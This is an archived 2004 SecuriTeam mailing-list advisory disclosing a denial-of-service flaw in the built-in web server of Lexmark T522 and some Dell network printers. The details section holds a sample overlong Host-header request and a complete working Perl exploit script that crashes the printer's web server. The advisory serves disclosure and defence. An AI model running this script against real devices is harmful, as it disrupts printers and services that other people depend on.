[NEWS] Lexmark Network Printers Built-in Web Server DoS
From: SecuriTeam (support_at_securiteam.com)
Date: 07/27/04
- Previous message: SecuriTeam: "[NEWS] Outblaze Email Cross Site Scripting"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 27 Jul 2004 20:03:01 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Lexmark Network Printers Built-in Web Server DoS
------------------------------------------------------------------------
SUMMARY
Several Lexmark network printers are shipped with a build-in HTTP server
for administrative tasks. The web server software is vulnerable to a
Denial of Service attack that will force the web server to restart and/or
stop taking requests.
DETAILS
Vulnerable Systems:
* Lexmark T522 and all which use the specific web server
* Dell network printers that use the same web server
The Server does not handle long HOST arguments in the HTTP Header
correctly and therefore causes the server to crash. An example of sending
such a request:
GET / HTTP/1.0\r\n /Host:AAAAAA[x1024]
Exploit:
#!/usr/bin/perl
#
# Denial of Service agains Lexmark T522 Network Printer Webserver
# by snakebyte / eric ( http://www.snake-basket.de )
use Socket;
$target = "192.168.0.54";
$port = "80";
$lamecode = "A" x 1023;
$iaddr = inet_aton($target);
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
$proto = getprotobyname("tcp") || die "getprotobyname: $!\n";
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die "socket: $!\n";
connect(SOCKET, $paddr) || die "connection attempt failed: $!\n";
send(SOCKET, "GET / HTTP/1.0\r\n", 0);
send(SOCKET, "Host: ".$lamecode."\r\n\r\n", 0);
close SOCKET;
ADDITIONAL INFORMATION
The information has been provided by <mailto:pkr@csis.dk> Peter Kruse.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Outblaze Email Cross Site Scripting"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] Xedus Webserver Directory Traversal and DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The Xedus web server is
vulnerable to a directory traversal. ... this vulnerability constitutes a denial of ...
(Securiteam) - [NT] Quick n Easy/Baby Web Server ASP Code Disclosure
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Quick 'n Easy/Baby Web Server
ASP Code Disclosure ... Quick 'n Easy Web Server version 3.1.1 ... 22/03/2006
- Initial vendor notification ... (Securiteam) - [NEWS] IP Phones Based on PA168 Chipset Have Weak Session Management
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... IP Phones Based on PA168
Chipset Have Weak Session Management ... admin web console running as superuser. ...
is for them to send a well-formed request to the web server. ... (Securiteam) - [EXPL] Baby Web Server Command Validation (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Server was to design a simple
web server with support for ASP." ... By sending an especially crafted request to Baby
Web Server, ... (Securiteam) - [NT] Eternal Lines Web Server DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Server is "a free Web Server
for use with Windows". ... program's connection queues (approximately 70 connections).
... sub Slp ... (Securiteam)